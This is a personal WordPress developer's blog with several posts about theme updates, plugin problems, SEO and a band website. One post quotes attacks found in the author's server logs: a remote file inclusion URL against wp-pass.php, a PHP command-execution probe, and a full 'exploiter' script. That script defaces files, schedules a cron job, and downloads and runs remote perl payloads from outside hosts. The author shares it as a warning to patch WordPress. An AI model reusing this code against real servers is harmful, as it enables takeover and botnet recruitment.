Its been a stupidly busy month for me so far. Some specific apps Ive been helping to write for the Christmas period are due for launch in a few days, plus Ive been freelancing on the side. All in all, November hasn’t given me much time to myself!

So, to address the issues here:

I know Modmat needs updates to handle things like threaded comments, etc. Ive started work but haven’t had a chance to finish yet as I havent fully studied 2.7 and so don’t want to release and discover later I’m missed support for something. Modmat should work with 2.7 out of the box, so you shouldn’t have to worry about the theme breaking – but obviously changes will need to be made to support the new features. I’ll post here when its done and upload the latest files to the project page.

Facebook Dashboard Widget – again, Ive spotted it isn’t working. This shouldn’t be too difficult to fix but I need to find an hour or so free to look into it. I’m hoping to have an update out in the next few days – time permitting.

So sorry to anyone I haven’t got back to. I haven’t forgotten about you, and I still have your emails here. The response just may be a bit delayed.

Its crazy some of the sites you see turning up in your referrers list when you release a theme with your link on the bottom. As well as hundreds others, so far I’m up to 4 straight porn blogs, 3 gay porn blogs, 6 (seriously!!) dominatrix blogs and a “pay us for pain” type site. Nice! Looks like I’m hitting all the niches!!

Its almost made me want to throw another one together. In fact, theres no almost about it – there could be thousands of porn sites out there waiting for me to get off my arse (not literally) and do a design they can use – I don’t want to let them down!

So now just the age old problem – finding enough spare time!

Unsurprisingly, exposing it to so many people has surfaced a few minor bugs, which are now fixed. Modmat 1.0.3 is now available from the Modmat project page. I’ve submitted the updates to WordPress, so hopefully the new version will appear in the next day or so (currently showing as 1.0.2).

Download it and try it out! If come across any bugs, or have any suggestions or gripes, either post me a comment or fire me out an email and let me know!

Thanks to the 3000-odd people that have downloaded it so far, and the great number of sites that are actually now using it (Yahoo site explorer is a great toy ). You’ve prompted me to start work on a completely new theme, and I hope to release a 2 column Modmat clone in the not too distant future, following on from user feedback.

Thanks again for making the effort feel worthwhile!!

Admittedly, I havent put much time into figuring out the problem. I had a quick look, then gave up after I noticed I was getting any of about 4 different errors depending on when I tried to use it. fsock errors, unzipping errors and now a “cannot create folder” error.

Hopeully its a permissions thing, in which case – what folder needs to be chmoded? Most likely the plugins folder (assuming its not trying to create a temp folder somewhere), but then I have to ask myself – do I really want to change the permissions on my entire plugins folder? Bit of further investigation needed methinks…

I’ve seen it in action on my workmates installation and it looks pretty damn cool. Plus anything that can save me 10 minutes on mundane tasks is always a bonus. :sigh: I guess I’ll bite the bullet and change the permissions. A little annoying though as I generally try and keep all my core files owned by root, then avoid using my root account whereever possible. Not the most effective line of security, but hopefully it’d give any would-be hackers a harder time compromising my installation…

But then again, I may just sack the whole thing off for now. The SWF uploader looks sweet, the colour scheme/layout is a MASSIVE improvement (regardless of what the “I don’t like change” crowd are saying) and it seems to perform a little better – on my local installation at least. But… its a big release, so bugs are almost inevitable. 2.3.3 is a stable release, so maybe waiting for 2.5.1 would be more sensible…

Well worth a read, if only for the list of relevant SEO plugins. One thing I took from this is the fact that I now have a lot of duplicate content since the release of WP 2.3, because I didn’t take account of the new “tag urls”. This can be fixed by using “excerpts” in posts, to keep the tag/category pages unique (depending on which one I allow the search engines to index). I’m glad I picked that little gem up now when I only have 2 dozen posts to edit, rather than in 2 years time.

A lot of whats on here are tips Ive seen elsewhere over the last year or so, but its good to have it all and more in one report (plus it makes good reading when your companies network goes down for the second time in a week!)

Hat tip to the authors, Blizzard Internet and Weblog Tools Collection for pointing me in its direction.

Seriously, I don’t use Askimet – just comment moderation – and if I didn’t know better I’d think the blog spam epidemic was over! (we can all wish)

But the exploits… it always seems to be the same type, all of which (so far) have been stopped by the fact I update my WordPress install regularly. The common trick is using the wp-pass.php vulnerability, which was apparently fixed in wp 2.2.2. Basically, my logs show a 404 from this address like this:

http://mou.me.uk/wp-pass.php/?_wp_http_referer=http://frikyrkja.net/config/exp667.txt?

(We can assume http://frikyrkja.net is probably a compromised server somewhere)

So, of course, I check out this site and take a look what nasty code they’re trying to execute. 9 times out of 10, its looked relatively harmless:

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

This seems like more of a fact finder – testing to see if your server is vulnerable, etc. But today, I came across a particularly bad one:

//exploiter v0.01 for rfi reloader by axe
$safemode=@ini_get('safe_mode');

if (@$_GET['filexp']) {
 if (@$_GET['deface_msg'])
 {
 	$deface_msg = $_GET['deface_msg'];
 }
 else
 {
 	$deface_msg = 'Patched Mother Fucker :p';
 }

 $filexp = $_GET['filexp'];

 $fp = fopen("$filexp","w");
 	if ($fp)
 	{
 		fwrite($fp,$deface_msg);
 		fclose($fp);
 	}
 }

$fp = file_exists('index.php');

if ($fp)
{
}
else
{
passthru('touch index.php');
}

if ($safemode)
{
ini_restore("safe_mode");
ini_restore("open_basedir");

shell_exec('killall -9 perl');
shell_exec('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

shell_exec('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
shell_exec("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job");
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}
else
{

passthru('killall -9 perl');
passthru('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

passthru('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
passthru("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job");
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}

I’ll be the first to admit my Unix knowledge leaves a lot to be desired, but from what I can see this looks to be setting up a cron job to run a file 1 minute later before creating a folder and uses every method it can to try to download a text file to your server, which is then executed when the minute is up and the cron job deletes itself. Clever. You can see an example of the text file by clicking here. (Note: Ive added an exit; command top to stop the b*astards using this text file on other people!)

Scary as hell. I havent had a chance to sit down and puzzle out exactly what this script does if you execute it, but I’m willing to bet its not pretty. There seems to be some code to connect to an IRC server, so the point of this is most likely to turn your server into a zombie bot. Or possibly to host exploit scripts for other unpatched WP users to download. I’ll know more when I go through it properly (and hopefully learn a few new things about Unix!!)

The moral of the story? Keep your WordPress up to date! No seriously, go do it now…

Now built on WordPress, the site upgrade now allows commenting on individual posts, auto sitemap generation, the code is a lot cleaner (I’m a lot better at CSS now than I was 2 years ago!!) and it should make any future additions a lot easier (theres been some talk of selling band merchandise from the website…).

The drummer’s my flatmate – hence the fact I agreed to a day of unpaid work! Check them out – http://www.angeldown.co.uk/. They’ve knocked out a few good tunes over the last few years – “Still falling” is a personal favourite of mine.

Credit to GigPress, which on its own made the entire project worth doing – writing a gig admin back-end myself would have taken a least a day, this plugin took me less than an hour to customise.